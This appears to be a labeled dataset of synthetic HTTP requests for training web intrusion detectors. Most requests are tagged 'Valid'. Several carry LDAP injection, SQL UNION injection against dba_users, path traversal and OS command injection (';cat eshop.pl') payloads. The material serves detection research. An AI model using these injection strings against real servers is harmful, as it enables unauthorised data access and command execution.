GET /eneki/t5OOKIHg5qdek2IZp3.asmx?ZkFJ.o6TG=sjg1Enburnsee&dr3A=7&RrEMmhUidaheom=eRgbzts&so0=257692&55Cv-RLiA=an3gc9tOsgjoul&efeotkseacp8=547998 HTTP/1.1
Host: 142.177.136.42:98
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: aer-aciS, n-tte, lnsre-ah1euzL, std3-eporo;q=0.8
Cache-Control: no-cache
Client-ip: 139.204.120.139
Cookie: tRIdNnntacNit=tu;ntnas4gDhuli=9;iS7uTD=eieiiNdotey;greogBrst6Ltvun=; iehinneval7wl
Cookie2: $Version="53"
Date: Mon, 06 Aug 07 06:21:33 UTC
ETag: "Aaf75QbpxClxPVP"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Fri, 21 Nov 08 21:11:00 GMT
If-Unmodified-Since: Mon, 01 Oct 07 10:22:00 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jul 05 03:31:17 UTC
Max-Forwards: 7417
MIME-Version: 5.6
Pragma: 5oklw8ia='faemHt'
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: hogier hrhcegnl=pc1asj
Range: 761-,-655
Referer: http://1lLsgch.gov/wwrai/or1bE9/ayasmnra/Nba7oatn.cgi
TE: trailers,gzip;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: mpt5oai/1.1.1
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 869x955
Via: 8.1 www.msod9r.css
Transfer-Encoding: identity
Upgrade: tcj/8.9
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23759
Start - Id: 9593
class: Valid
GET /icyAyogHMAW8Yj/Q6chttp4e/vD79eezq1E/lit7t8his/hxDhrCjMueh/sk.DXgb7WNzC9p_R8VYe/f8Ln3.bin?odf0gelTfttpida=h-nmgo&MZ96EgxeUhtaccesy=8&NNlibaLb=oituefowna&sanotesicbet7=bA%5C&hzmre=uf8M5gvLQO&ihGs.ZformV=w+%3Coshutdown&_GUbpQET3_f=e57roa HTTP/1.0
Host: www.egDrus.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 123.189.18.103
Cookie: Dl7rayiscolt=2eq]woxsmowhereSoH;tW=pgaa9veccou;xhmerrnaIda=sltz;kdWemWvbscript=oTMlVfH;sTeeCseAnv=7t0i9Ooahmorr
Cookie2: $Version="085"
Date: Sun, 25 Nov 07 07:15:34 GMT
ETag: W/"0hswnwaB64bYimlQqyZ"
Expect: t0pna=erg0c
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Thu, 24 Apr 08 04:26:21 GMT
If-Match: *
If-None-Match: *
If-Range: "rZ4ojGoS11PyNLRLJ4x"
Max-Forwards: 207
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/3kteNf/fyt4nept.nsf
Authorization: e2w3 e8battw1=jte6ehf
Range: -7342
Referer: http://www.ieT5ao.org/arsaet.mpeg
TE: trailers,chunked,trailers
Trailer: Host
User-Agent: nelfttTskelindraarvH
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7883x011
Via: ihs/2.8 221.88.131.1:7, 7.9 www.eTaao.png, 2.4 www.eeptfaan.tiff
Transfer-Encoding: identity
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 199.4.112.189
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9593
Start - Id: 596
class: Valid
GET /eRqV2BcJDDAygU/2GLExp_CkfqOP/s3rxeafserhn/7o6omtueors/tclzdZoladRe1hdD/Mvn48xOmSDvI/5ttwkjtheeheo/Dettswtapwughxefeca/p2cs6yepxJxrOJAiN.cfm?Nbohbng0kt=nph-ernhbs&wet7e5clhgd=08443519&TtmpVinputu7aetcIPgB=6oe%25&hen2xwa1=2sqzstlseymtIrti&d.bjVOnc=tg_HZy-&sbeo=HA HTTP/1.1
Host: 83.204.249.217
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic, cp-950, x-mac-chinesesimp;q=0.2
Accept-Encoding: deflate, identity;q=0.6, compress;q=0.2, identity;q=0.2, compress;q=0.7
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 36.96.211.242
Cookie: eebinnr=9tnewdssezrenfesSe;leJsoHaos=stredeolm
Cookie2: $Version="23"
Date: Fri, 25 Sep 09 12:46:06 CET
ETag: "mpak1MNfePXIbOgS"
Expect: tiAta
From: i7wh@s1dUih1sA.it
If-Modified-Since: Sat, 30 Jun 07 24:18:26 GMT
If-Unmodified-Since: Sun, 18 Dec 05 04:24:33 UTC
If-Match: "IfHy646SXA6Bfm6q-0w"
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest qop=spuelr
Authorization: Digest username="ony0re2e"
Range: 00-
Referer: http://tpTNd.org/cmdnreda/Tevelss/eotwcT/rbnoQ/m1bnrnwy.js
TE: deflate;q=0.9,trailers
Trailer: Warning
User-Agent: xlsdtwDe (afO.-LTgn; r@QANKRLOZ; 1HMH9hO; n8EH3j3bYT; gx6k8PcMv)
UA-CPU: Sparc
UA-Disp: 8563,166,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 412x961
Via: monl/5.4 www.meitnaa.css, eh8s/4.6 www.whioo.tiff:56512
Transfer-Encoding: snar
Upgrade: thc/6.8
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 119.10.246.153
X-Serial-Number: 541499677250739
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 596
Start - Id: 37466
class: LdapInjection
GET /dt/enwfmEb8/4MFJOOzr/tHRKbV-d@8i/l@PNAwjS_bQeK/laNehatSesR4tjtteoI/emhcX6BY0qWaVw.css?9otpEgahrn6=6&6ancaHltrndoee=iaAyee&hrccAtigoa1=eOy0mPXX&mu=ta7b6eabOvd7a&t1iD7=42216&ntMeBlfleo7uc=4j.e&l9MimgWEC=aOVLf&p9ESyy7rhol=s&oLmetaHMPStCHvbscriptd=ks&L@PY393R=49565685&e59la=6272374&8etufra7s=1878 HTTP/1.1
Host: www.rcpaa2qn.ch:80
Connection: keep-alive
Accept: audio/*, application/*;q=0.1
Accept-Charset: macintosh;q=0.5, utf-7, x-mac-hebrew;q=0.0, x-mac-greek, iso-8859-3;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=92
Client-ip: 97.241.16.223
Cookie: oIuecsa5mtoaieh=o;sI7peagieuo=)(  |   (displayName=had*)    (name    = had* )( mail=had*    );ITqRM8whereR=|tatrome9a=;sIjTS8vutmp7=aRZk4Q;ltweyoelaben=jM1wZnD
Cookie2: $Version="30"
Date: Thu, 13 May 04 13:46:29 UTC
ETag: W/"V8R_45eWVLFPfXgmsM7e"
Expect: xeilyu=t8r8Bikn;huTb=yonIs
From: 7EAiyd@ttlgtqrt.st
If-Modified-Since: Sat, 12 Mar 05 05:13:44 UTC
If-Unmodified-Since: Sun, 27 Feb 05 15:27:25 UTC
If-Match: "_TWoEm2s0d9k3CB0nteh"
If-None-Match: "qVLRbyasdBTSxQbcG_"
If-Range: *
Max-Forwards: 6
Pragma: no-cache
Authorization: Digest opaque="eynl"
Range: 2-927066
Referer: http://iiDVni.com/ixde.png
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 4.1; ie-eO; rv:6.3.7) Gecko/39111431
UA-CPU: x86
UA-OS: Win9x
UA-Pixels: 9871x247
Via: HTTP/5.7 212.10.12.251, 5.7 www.Isfq9L2.htm:43, 9.2 www.tsskfa.htm
Transfer-Encoding: identity
Upgrade: en1/5.2
Warning: 084 221.225.214.82 "apGeti6neO" 
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37466
Start - Id: 20453
class: Valid
GET /fRhft/n06bul8uCsJTcDkkc.sh?zlfatehneirofn2=Eet&xTuQ=968656&iti=sock_streambdghrhttpst%27tb&Wornco9sVincludeY-w=7hf&Vmochao8vu=703048 HTTP/1.0
Host: www.yeegoz.gov:2148
Connection: close
Accept: audio/*;q=0.7, application/rtf;q=0.6
Accept-Charset: iso-8859-6;q=0.5, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 83.158.227.172
Cookie: so=790744916;octkaOh9k=frE;l9=l;ssmwnhWteSeft=setniiaoo9tLreg
Cookie2: $Version="3"
Date: Fri, 25 Aug 06 07:33:40 GMT
ETag: "unavVCJD-pboO@Cu"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Wed, 23 Jun 04 03:07:36 GMT
If-Unmodified-Since: Thu, 01 Oct 09 09:56:11 GMT
If-Match: "Ape1uD.VNpIvv@jVSt.N"
If-None-Match: "lJHxTm2iO0WT@ne-5m"
If-Range: *
Max-Forwards: 61
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic aWJQamVScjpybmVncw==
Authorization: P0dt khrge=hywi9
Range: -896,61-724379,-171
Referer: /w2dtesf/rrudijye/BRptr.mpg
TE: trailers,trailers,deflate;q=0.3
Trailer: Authorization
User-Agent: Beicume (oaVAsu; hTuXER; pJd01c)
UA-CPU: 68000
UA-Disp: 635,2020,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2799x9300
Via: FTP/2.9 142.228.6.121
Transfer-Encoding: identity
Upgrade: zosEe/8.8, bsan/1.2, a3f/0.3, ioths/1.6, ill/1.5
Warning: 434 www.6rh0.tiff "tawl4aoerems8gnd" 
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20453
Start - Id: 14214
class: Valid
GET /dBiwucl0pzy/83@8XRB/7GRz_Ht/Tiw3te/empeeLioi/u1.94bOBb7L/Hgaseraaamhd/SDbJLUyDO.js?sodhEtbn=sAperlrdndqbodyS&nolosrltrq=ei6M%3B&CgsthDP=aytlelakNrten0Nno&DE77dLK=apY0Wk&samhpqAW=g6tao&cidejR9stdinmQc=7401&iseelpbLe=777917&daraStesn4=00606492&xdsqEc7UVaopen=pieneir5aM&6En219=22349 HTTP/1.0
Host: www.rcjb7i9rmE.de:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.0, x-mac-chinesetrad, iso-8859-8, isiri-3342, x-mac-icelandic
Accept-Encoding: gzip;q=0.1, identity;q=0.8, identity, compress
Accept-Language: 2et-uubwnaiJ, nhido-nPb1, sf-l, tjoh3a-rworageh;q=0.6, xooew-Oa;q=0.7
Cache-Control: ez='wa'
Client-ip: 174.123.138.82
Cookie: rtzare=oRQF;ofzvnnLh=iFlW
Cookie2: $Version="28"
Date: Wed, 04 Mar 09 21:18:12 GMT
ETag: W/"rg9ttKZHer1NDrm"
Expect: tsTeh
From: hoeiim@ceoiedong.st
If-Modified-Since: Thu, 22 Nov 07 15:15:10 GMT
If-Unmodified-Since: Mon, 08 Mar 04 11:35:57 GMT
If-Match: "VgGZbeE6OfY5rL3"
If-None-Match: "8zwBq0tEQ3mREW9Kz1hH"
If-Range: Sat, 19 Jul 08 09:23:31 CET
Max-Forwards: 041
MIME-Version: 0.5
Pragma: p=nsoesmot
Proxy-Authorization: dndh ietm=rse69h3
Authorization: Basic ZHJpb2VuOmxuZXMwY0E=
Range: 835-87
Referer: /Stee6nam/eNromOc.htm
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/8.4 (compatible; MSIE 9.1; Windows NT; iIidlOj; uTtmt8N; oau2lLvzh)
UA-CPU: x86
UA-Disp: 168,1348,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 962x171
Via: 2.0 www.beel.css:8, HTTP/4.0 www.8otbz.html
Transfer-Encoding: compress
Upgrade: tqng/4.9, Naqt/0.6
Warning: 421 253.115.191.155:964 "huwmindxnp3iEtec" 
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 8726872524288200
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14214
Start - Id: 42451
class: SqlInjection
GET /.EHhffWpCp.PFYpasswd/lK28ZBjUQB/t82nrcloIi/vhLDDtPF2xj2AI8.324/4n.ibBlWt9gytS6/z9YF1@-OUm8pKhYUY/KyjKQP4HVpC/sn6Dc6s5UIejrR@TA8vn/9vVKz.GUrlyeV3ZiA/sSqfoUGPXeZylgDR4__/oUTuRz_3.nsf?9a98hnr=mtlbenq2nunion%26categ&dmgrtcisMi=rBDA7fR0wSpp&ib=tiioa&ymiXBbJ7abimgN=323620&6oqeofyd=s%40S&tnshhSsnhOdyn3=cgG1w9-d&deleteEGF=si_MK&9hrina2er=chairs%27++++UNION+++++SELECT+++ealr+FROM+++dba_users+++++WHERE+name++like+++++%27%2525&esiereonat=%3A4vkr&hethhragncm=50851&oIlky=metaajcr HTTP/1.1
Host: 95.182.205.89
Connection: close
Accept: application/*, image/*;q=0.6
Accept-Charset: iso-8859-6;q=0.7
Accept-Encoding: deflate;q=0.8, compress;q=0.6
Accept-Language: sos-vtpdUlv, aoEioqO-t, aonml-n5x;q=0.5
Cache-Control: no-store
Client-ip: 220.25.102.83
Cookie: fEnacanb8olennc=dsVycbFi;bOsPNHMXftpBs=sajjiR|dnu5Doje;npneltReeca=it4tizeaazcsaeo
Cookie2: $Version="574"
Date: Sat, 03 Mar 07 07:07:07 UTC
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 100-continue
From: rndd@adret.net
If-Modified-Since: Fri, 07 Nov 08 11:29:52 GMT
If-Unmodified-Since: Mon, 21 Sep 09 18:58:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 10
MIME-Version: 0.7
Pragma: ebeE=lb9hcCeo
Proxy-Authorization: Digest realm
Authorization: sslt Eskt=oit2itS
Range: 6369-,501-7998
Referer: /e9aae0/a4iSnh8n/uuo2xmti/gltxmdq.cgi
TE: trailers,chunked,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.5 (X11; U; Solaris 8.5; nP-yh; rv:3.1.6) Gecko/25743839
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0316x1204
Via: 0.8 www.e0uahdl0.jpeg
Transfer-Encoding: gzip
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 631261097
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42451
Start - Id: 44933
class: PathTransversal
GET /ac@RTejQKJp/hzCf/@5/gauqi1miaatNied/n8Bu/lmlccloiyiaomtNby/lxlttNlehg.dll?cnGm1d=aseeet4hp&EOHobject03RT8=eTLoLAzL&7phpO-group by=file%3A%2F%2F%2Fg%3A%2Fa1%2Ftx%2Flsouoq.xml&cb7x8ncgze=n2eand0&Vlid6passthruQ8S4B-=tesiUpiaa+a%5Bo&zPK6wZ-10Ki=i5tusrdeecnsatzgra&aOdalri=nc8jU HTTP/1.0
Host: www.wPneh08.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.4, x-mac-arabic;q=0.2, iso-8859-5;q=0.3, iso-10646-ucs-2;q=0.1
Accept-Encoding: 
Accept-Language: wwfue-sdree, i-rveneply
Cache-Control: Kcarcep=raaLo5t
Client-ip: 119.33.88.93
Cookie: eyec=2insz3eH;eriS=xgp.yv;fysc=g@mal
Cookie2: $Version="19"
Date: Wed, 26 Sep 07 16:35:24 CET
ETag: W/"XLxzFuV8SXEFv.mqCY"
Expect: laocgTl
From: soalt1r@dvplbabmDs.be
If-Modified-Since: Sat, 21 Oct 06 08:43:42 UTC
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "sXrrjX19nY71Oz8c8LN"
If-None-Match: *
If-Range: Sun, 10 May 09 10:14:13 UTC
Max-Forwards: 3
MIME-Version: 8.4
Pragma: De=scotyld
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: dsaymv n8rorao=tsrtn
Range: 965978-,-986,-07275
Referer: /uner.pl
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.2 (compatible; MSIE 5.4; Open BSD i386; mroient; hmsdx; Tnt3ewu7)
UA-CPU: StrongARM
UA-Disp: 3440,7675,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 3.3 www.ushn.png:84, 5.7 www.ctolb.htm, 3.3 www.ipzciEe.html
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44933
Start - Id: 13458
class: Valid
GET /dcnbeuyrgnroetc8c/aJeF04sSWn2@OKfXu/mSeb5eys.php?DtaBHf2=259857130&Pm_4execKPR6=81588820&oklzpan=sceRntls&6btkxnd4isRoeja=net&Uhse=rfeE6z-tFq HTTP/1.0
Host: 48.206.24.44:80
Connection: harpfstr
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ein0aoet-Uitotbev;q=0.8, jnl-caE
Cache-Control: no-store
Client-ip: 208.189.220.255
Cookie: nwre9tstwzzddto=%'ru7&Wjqssuie5;ktege=u0mtNuiat)da;UoKir9hM.C=400412590;tnsai2ejorshOfo=edprocessing-instructionk?qi;bgsounduoo4ew;stoe5lVn8R=dDrtdysnofeoe;tbvbaotattq=iiwegt
Cookie2: $Version="193"
Date: Mon, 23 Oct 06 10:22:40 UTC
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: jo5am=rShvn;aptesIgs=saftiid
From: rwsar@atw2syurH.be
If-Modified-Since: Sun, 15 Jun 08 21:02:25 CET
If-Unmodified-Since: Sat, 25 Dec 04 01:49:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.5
Pragma: e=qrcB
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: Basic b21vc2l0TDpvaGV2RQ==
Range: -20257
Referer: http://asdetc.de/lndPon.mp3
TE: trailers,gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: cFOdlnI
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1859x8849
Via: 5.7 www.ef3ahD.png
Transfer-Encoding: gzip
Upgrade: bO6/2.7, oawf6h/2.0
Warning: 403 www.ameiXrAq.jpg:50 "inohizhcts2llsj" "Mon, 19 Jun 06 02:09:24 GMT"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13458
Start - Id: 36639
class: OsCommanding
GET /bin/ansio.pl/seite=;cat eshop.pl|? HTTP/1.0
Host: www.aA5aodaal.ch
Connection: close
Accept: application/*;q=0.7, application/*;q=0.3, audio/x-wav
Accept-Charset: euc-cn;q=0.9, windows-1251;q=0.3, shift_jis, macintosh;q=0.5
Accept-Encoding: 
Accept-Language: t-vmrtge, eattz-iie;q=0.2, ewtKfbt-nlgvuTcZ;q=0.9, teih-t3ET, rnHsO-iSr
Cache-Control: only-if-cached
Cookie: ndhpl1snthiiQp=7;leEd=gxp_tr $foooh slnetcrmCe;eawsnHacaRria=173529427;17sswut=eT04Uyyks;hfseenI=77777982;tsrnfts=psc e 
Cookie2: $Version="74"
Date: Sun, 13 Nov 05 14:18:07 UTC
ETag: W/"Uz@kS7@BDhdUUqlE@y."
If-Modified-Since: Mon, 11 Feb 08 21:11:40 GMT
If-Unmodified-Since: Thu, 09 Dec 04 21:35:25 UTC
If-Match: *
Max-Forwards: 1218
Proxy-Authorization: Digest cnonce="giac"
Referer: http://www.in54aod.org/eteaos0r/nwj5.html
TE: chunked,trailers,deflate;q=0.5
Trailer: Range
User-Agent: Mozilla/9.3 (Windows; U; WinNT 8.0; nr-7p; rv:7.6.9) Gecko/43589757
UA-Pixels: 073x2396
Via: rcse/6.0 www.iins7on.htm
Transfer-Encoding: gzip

null

End - Id: 36639
Start - Id: 18794
class: Valid
GET /lax/rb1o@cW6dVCJNgR3jZY3/n4uTq6/loror3Tnar/aar-kza00L0/cr7/Lg5nc9QKM/dJfSbTfjJCuZYBL/oM/_BjC.jsp?arUr=cr&genlpi6ytimtl=nyn&mo=galike&iwosvr4hter1iea=1&tvensdtHnou=7to&v8lansnnwjlanst=iqrU&rIgyb.xyXv.=d7r&qJhavingWj=yrvlmo&0iaaz1rsi=dQI_D&iwrol3wlnudtt=bu&tetTaH7e=33&tmeS=oroldo6qenstm&8uEi5i=rzee8y HTTP/1.0
Host: www.neeenu7sy.net
Connection: narApes
Accept: application/*;q=0.3, application/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 201.90.192.76
Cookie: nbdxp=n;sfDO7epnc=peorel3ieni;irNcetesehEet=8766
Cookie2: $Version="72"
Date: Thu, 25 Jun 09 24:54:43 CET
ETag: "915NzLGEFb2FG7Ud@t"
Expect: 100-continue
From: nn9rr@wiueoi.biz
If-Modified-Since: Tue, 06 Jan 04 13:12:21 GMT
If-Unmodified-Since: Thu, 04 Jan 07 17:54:44 CET
If-Match: *
If-None-Match: "EsJxFiU0JctPAsx"
If-Range: Sun, 10 Jan 10 13:30:58 GMT
Max-Forwards: 9
MIME-Version: 8.1
Pragma: t='weet6'
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Digest algorithm=MD5-sess
Range: -8,379-,90-
Referer: http://nebwsnN.com/bsxl/eh8eij/hhw1ses/9ee0ok/iltR.swf
TE: trailers,trailers
Trailer: Accept
User-Agent: tGc1NL http://www.smNce4.cz
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: FTP/1.2 www.Ralh.js, 6.0 www.osglwt.tiff, 0.7 251.115.91.228
Transfer-Encoding: b7nw
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18794
Start - Id: 7756
class: Valid
POST /CtkrfdmtOh0toeYio/t8/oGew@lw.Gx/m9E/gei/t0iiaSiptsomg5/koOxmMteoxirwRstote/atalYreni/4e-H_mFU4fxn.aspx? HTTP/1.1
Content-Length: 109
Content-Language: AL,kewaYa,NtEx
Content-Encoding: deflate
Content-Location: /eoos/strp.cfm
Content-MD5: emlIZm9hZW90N2RzRWVzNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Nov 08 20:36:00 CET
Last-Modified: Fri, 14 Dec 07 11:02:53 CET
Host: www.opsuhcoh0z.ch
Connection: ilR1yue
Accept: text/html
Accept-Charset: ks_c_5601-1987, windows-874;q=0.7, iso-8859-8-i;q=0.2, gb2312, ks_c_5601-1987;q=0.8
Accept-Encoding: gzip, compress;q=0.1, compress;q=0.6, identity;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 200.184.5.24
Cookie: 6p5dneia=9044651;hcr5rhhom=aai;BcQo0xWfC=nAzjjZwB5iF;le5t5n9hcgdtIDn=7846
Cookie2: $Version="8"
Date: Wed, 20 Apr 05 09:31:05 CET
ETag: W/"2f_0tS3NIUSQdknBLpr"
Expect: lsnpOs
From: 9ynn@9e1lsae.st
If-Modified-Since: Sun, 18 May 08 03:45:37 UTC
If-Unmodified-Since: Wed, 05 Aug 09 15:09:29 GMT
If-Match: *
If-None-Match: *
If-Range: "q@6OkcVN@MgRIhHICNj"
Max-Forwards: 7
MIME-Version: 2.6
Pragma: r='evp'
Proxy-Authorization: Basic bm50aXRjcjpzbzhs
Authorization: wcr7l pneheh=hm30
Range: 42-,574-0,04-96557
Referer: http://ykatsnc.de/qwetxpi/efaqpai5/grwe.sh
TE: trailers,deflate
Trailer: If-Match
User-Agent: 1RirtAh/1.7
UA-CPU: PowerPC
UA-Disp: 968,7728,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2784x639
Via: el2/5.6 221.195.231.25, HTTP/9.4 112.16.93.118:38884
Transfer-Encoding: bMepEe
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 246.243.72.110
X-Serial-Number: 755834931599886
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

adn4=98&u-acK0lP8xterm=su&nymlsyh=~ln&h2a9ceeeeboclA=836373&ntchh=o0Si&Otl=y4eH;gdunionueD%h&s11t3=7lBt

End - Id: 7756
Start - Id: 36049
class: PathTransversal
GET /ef1/sordgwalErTiloti/t3Eee9kjxhah3torhh/twTyi/tV5uKJAWiPtyyayB@/bWyZuv/nxKBZ8B3LcL.htm?engtEroieauco=h0.hQ4&nnc5E5fVtmle=epe&9Nk2teeend6n=6E%26sxhtir&nfoeEr=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Friretiro%2Fneat%2Fvelein%2Ftrenrelaor.php3&Tatmp6NNally5xmlMV=13&rgsdibrrzaA=a84almlew1elattdocumentieh%3B HTTP/1.1
Host: 21.134.123.226
Connection: keep-alive
Accept: image/*, video/mpeg;q=0.0, image/png
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 54.187.94.95
Cookie: csM=rFV;ebhrso=A;ogptohWi= systemw
Cookie2: $Version="8"
Date: Mon, 05 Apr 04 01:02:04 UTC
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: nSnorec=amMwieb;4mydye
From: prei@enuhageatF.uk
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Sun, 18 Feb 07 11:38:15 UTC
If-Match: "ZHPJIOmFl2_PVNMY_ju"
If-None-Match: *
If-Range: Wed, 03 Mar 10 12:32:05 GMT
Max-Forwards: 4
MIME-Version: 5.0
Pragma: e='ent'
Proxy-Authorization: itAtO nenh=umit9nn
Authorization: Digest nc=05dd6aeD
Range: 709-485
Referer: http://icseau.org/slqettc.asmx
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/5.3 (Machintosh; U; PPC Mac OS X 6.0; eo-i0; rv:9.2.3) Gecko/43712637
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 503 230.183.212.133 "reoem7gfiotv8mdeeL0V" "Sat, 30 Jan 10 17:01:26 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 2881124035235
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36049
Start - Id: 28705
class: Valid
GET /ER.swf?hxbrmaWNbaar=6&tiA4w=copyst&Inoknc=ih0mlf&7edetl0c8r=idd6AbvSBO&nxd=%29o1unl+nNenaj HTTP/1.1
Host: www.uqnt0s.com
Connection: limVds
Accept: */*;q=0.1
Accept-Charset: koi8-r, iso-8859-5;q=0.1
Accept-Encoding: compress, identity;q=0.7, identity, identity;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale=71
Client-ip: 192.48.51.137
Cookie: diuo=iyiQv6FgCC9p
Cookie2: $Version="0"
Date: Tue, 21 Dec 04 05:00:08 CET
ETag: "EsNhD0x-L@yMl16"
Expect: 100-continue
From: peAR@mnttien1At.ch
If-Modified-Since: Tue, 29 Mar 05 05:51:06 GMT
If-Unmodified-Since: Sat, 26 Mar 05 12:25:54 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 10:58:54 UTC
Max-Forwards: 38
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: Basic aU5ldnpJYTpjaWV0dA==
